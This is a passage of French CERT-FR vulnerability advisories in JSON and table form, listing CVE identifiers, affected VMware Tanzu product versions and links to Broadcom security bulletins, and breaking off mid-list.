"url": "https://www.cve.org/CVERecord?id=CVE-2019-20633"
},
{
"name": "CVE-2025-38264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38264"
},
{
"name": "CVE-2021-3714",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3714"
},
{
"name": "CVE-2023-54071",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54071"
},
{
"name": "CVE-2024-56566",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56566"
},
{
"name": "CVE-2025-46392",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46392"
},
{
"name": "CVE-2025-40036",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40036"
},
{
"name": "CVE-2024-57993",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57993"
},
{
"name": "CVE-2024-47745",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47745"
},
{
"name": "CVE-2025-39833",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39833"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-37980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37980"
},
{
"name": "CVE-2024-53190",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53190"
},
{
"name": "CVE-2025-40262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40262"
},
{
"name": "CVE-2024-35784",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35784"
},
{
"name": "CVE-2024-56591",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56591"
},
{
"name": "CVE-2024-56544",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56544"
},
{
"name": "CVE-2024-56647",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56647"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2025-21649",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21649"
},
{
"name": "CVE-2024-57976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57976"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2025-0685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0685"
},
{
"name": "CVE-2024-57893",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57893"
},
{
"name": "CVE-2026-23231",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23231"
},
{
"name": "CVE-2025-37879",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37879"
},
{
"name": "CVE-2022-50071",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50071"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2024-56180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56180"
},
{
"name": "CVE-2023-39333",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39333"
},
{
"name": "CVE-2025-38643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38643"
},
{
"name": "CVE-2021-3864",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3864"
},
{
"name": "CVE-2025-39771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39771"
},
{
"name": "CVE-2023-52591",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52591"
},
{
"name": "CVE-2024-26648",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26648"
},
{
"name": "CVE-2025-66862",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66862"
},
{
"name": "CVE-2020-11868",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11868"
},
{
"name": "CVE-2020-24352",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-24352"
},
{
"name": "CVE-2024-36000",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36000"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-39819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39819"
},
{
"name": "CVE-2022-49296",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49296"
},
{
"name": "CVE-2025-61780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61780"
},
{
"name": "CVE-2024-49914",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49914"
},
{
"name": "CVE-2025-38360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38360"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2025-39715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39715"
},
{
"name": "CVE-2025-36407",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36407"
},
{
"name": "CVE-2024-0217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0217"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-21732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21732"
},
{
"name": "CVE-2021-47658",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47658"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2025-4575",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4575"
},
{
"name": "CVE-2019-12067",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12067"
},
{
"name": "CVE-2024-57843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57843"
},
{
"name": "CVE-2025-38512",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38512"
},
{
"name": "CVE-2024-50135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50135"
},
{
"name": "CVE-2024-49916",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49916"
},
{
"name": "CVE-2025-68119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68119"
},
{
"name": "CVE-2024-49988",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49988"
},
{
"name": "CVE-2023-52648",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52648"
},
{
"name": "CVE-2024-49861",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49861"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2024-49893",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49893"
},
{
"name": "CVE-2024-44963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44963"
},
{
"name": "CVE-2023-53348",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53348"
},
{
"name": "CVE-2022-48766",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48766"
},
{
"name": "CVE-2019-15794",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-15794"
},
{
"name": "CVE-2024-49917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49917"
},
{
"name": "CVE-2022-50467",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50467"
},
{
"name": "CVE-2025-37849",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37849"
},
{
"name": "CVE-2025-32441",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32441"
},
{
"name": "CVE-2024-48875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48875"
},
{
"name": "CVE-2024-41935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41935"
},
{
"name": "CVE-2025-38162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38162"
},
{
"name": "CVE-2022-23491",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23491"
},
{
"name": "CVE-2025-22873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22873"
},
{
"name": "CVE-2023-5678",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2023-54047",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54047"
},
{
"name": "CVE-2023-53382",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53382"
},
{
"name": "CVE-2024-50060",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50060"
},
{
"name": "CVE-2025-39677",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39677"
},
{
"name": "CVE-2023-53651",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53651"
},
{
"name": "CVE-2025-21832",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21832"
},
{
"name": "CVE-2025-68371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68371"
},
{
"name": "CVE-2022-50383",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50383"
},
{
"name": "CVE-2025-39707",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39707"
},
{
"name": "CVE-2025-40275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40275"
},
{
"name": "CVE-2023-53387",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53387"
},
{
"name": "CVE-2026-31802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31802"
},
{
"name": "CVE-2024-45774",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45774"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2025-22053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22053"
},
{
"name": "CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"name": "CVE-2025-61664",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61664"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2026-25702",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25702"
},
{
"name": "CVE-2023-52452",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52452"
},
{
"name": "CVE-2023-42366",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42366"
},
{
"name": "CVE-2022-50863",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50863"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2024-35843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35843"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2025-39781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39781"
},
{
"name": "CVE-2025-39762",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39762"
},
{
"name": "CVE-2024-40999",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40999"
},
{
"name": "CVE-2023-53292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53292"
},
{
"name": "CVE-2023-52576",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52576"
},
{
"name": "CVE-2024-27002",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27002"
},
{
"name": "CVE-2025-0167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0167"
},
{
"name": "CVE-2024-57887",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57887"
},
{
"name": "CVE-2025-21730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21730"
},
{
"name": "CVE-2024-35865",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35865"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2023-52660",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52660"
},
{
"name": "CVE-2024-35995",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35995"
},
{
"name": "CVE-2025-69420",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69420"
},
{
"name": "CVE-2023-53371",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53371"
},
{
"name": "CVE-2025-38659",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38659"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-22041",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22041"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2025-22127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22127"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2024-27025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27025"
},
{
"name": "CVE-2025-38020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38020"
},
{
"name": "CVE-2024-27011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27011"
},
{
"name": "CVE-2025-15224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
},
{
"name": "CVE-2024-26605",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26605"
},
{
"name": "CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"name": "CVE-2024-38543",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38543"
},
{
"name": "CVE-2025-68263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68263"
},
{
"name": "CVE-2023-53187",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53187"
},
{
"name": "CVE-2025-38689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38689"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2026-1225",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1225"
},
{
"name": "CVE-2025-38275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38275"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2022-48744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48744"
},
{
"name": "CVE-2025-38070",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38070"
},
{
"name": "CVE-2025-68755",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68755"
},
{
"name": "CVE-2025-62525",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62525"
},
{
"name": "CVE-2025-71238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71238"
},
{
"name": "CVE-2021-0175",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0175"
},
{
"name": "CVE-2024-36012",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36012"
},
{
"name": "CVE-2022-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48706"
},
{
"name": "CVE-2025-40334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40334"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2024-46716",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46716"
},
{
"name": "CVE-2012-4542",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-4542"
},
{
"name": "CVE-2021-3773",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3773"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"name": "CVE-2022-49267",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49267"
},
{
"name": "CVE-2024-56592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56592"
},
{
"name": "CVE-2025-37854",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37854"
},
{
"name": "CVE-2025-38189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38189"
},
{
"name": "CVE-2022-48628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48628"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2024-50138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50138"
},
{
"name": "CVE-2025-40319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40319"
},
{
"name": "CVE-2021-44534",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44534"
},
{
"name": "CVE-2025-14831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14831"
},
{
"name": "CVE-2024-56565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56565"
},
{
"name": "CVE-2025-68193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68193"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2024-57872",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57872"
},
{
"name": "CVE-2023-28720",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28720"
},
{
"name": "CVE-2024-53093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53093"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2024-46833",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46833"
},
{
"name": "CVE-2024-47703",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47703"
},
{
"name": "CVE-2023-53742",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53742"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-38041",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38041"
},
{
"name": "CVE-2024-53177",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53177"
},
{
"name": "CVE-2024-56588",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56588"
},
{
"name": "CVE-2023-53452",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53452"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2023-6610",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6610"
},
{
"name": "CVE-2023-54261",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54261"
},
{
"name": "CVE-2022-50616",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50616"
},
{
"name": "CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
},
{
"name": "CVE-2023-53544",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53544"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2024-49911",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49911"
},
{
"name": "CVE-2026-23154",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23154"
},
{
"name": "CVE-2022-50708",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50708"
},
{
"name": "CVE-2026-3784",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
},
{
"name": "CVE-2025-9301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9301"
},
{
"name": "CVE-2025-11226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
}
],
"initial_release_date": "2026-03-20T00:00:00",
"last_revision_date": "2026-03-20T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0326",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-20T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37233",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37233"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37237",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37237"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37236",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37236"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37246",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37246"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37235",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37235"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37229",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37229"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37226",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37226"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37230",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37230"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37242",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37242"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37228",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37228"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37240",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37240"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37243",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37243"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37234",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37234"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37231",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37231"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37239",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37239"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37227",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37227"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37232",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37232"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37247",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37247"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37241",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37241"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37238",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37238"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37244",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37244"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37245",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37245"
}
]
}
CERTFR-2026-AVI-0339
Vulnerability from certfr_avis - Published: 2026-03-23 - Updated: 2026-03-23
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Kubernetes Runtime | Stemcells (Windows) versions antérieures à 2019.96.x | ||
| VMware | Tanzu Gemfire | Tanzu GemFire sur Tanzu Platform 2.2.x versions antérieures à 2.2.2 | ||
| VMware | Platform Services | Platform Services pour Tanzu Platform versions antérieures à 10.3.6 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.1107.x | ||
| VMware | Tanzu Gemfire | Tanzu GemFire sur Tanzu Platform 2.1.x versions antérieures à 2.1.4 | ||
| VMware | Tanzu | Tanzu pour Postgres sur Tanzu Platform versions antérieures à 10.2.3 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.261.x |
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Stemcells (Windows) versions ant\u00e9rieures \u00e0 2019.96.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu GemFire sur Tanzu Platform 2.2.x versions ant\u00e9rieures \u00e0 2.2.2",
"product": {
"name": "Tanzu Gemfire",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Platform Services pour Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.6",
"product": {
"name": "Platform Services",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.1107.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu GemFire sur Tanzu Platform 2.1.x versions ant\u00e9rieures \u00e0 2.1.4",
"product": {
"name": "Tanzu Gemfire",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres sur Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.3",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.261.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"name": "CVE-2024-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
},
{
"name": "CVE-2025-61730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61730"
},
{
"name": "CVE-2022-32189",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32189"
},
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2022-30631",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30631"
},
{
"name": "CVE-2026-30227",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30227"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2023-29404",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29404"
},
{
"name": "CVE-2026-1965",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
},
{
"name": "CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2023-45283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45283"
},
{
"name": "CVE-2026-27138",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27138"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2026-3783",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
},
{
"name": "CVE-2022-41725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41725"
},
{
"name": "CVE-2022-30635",
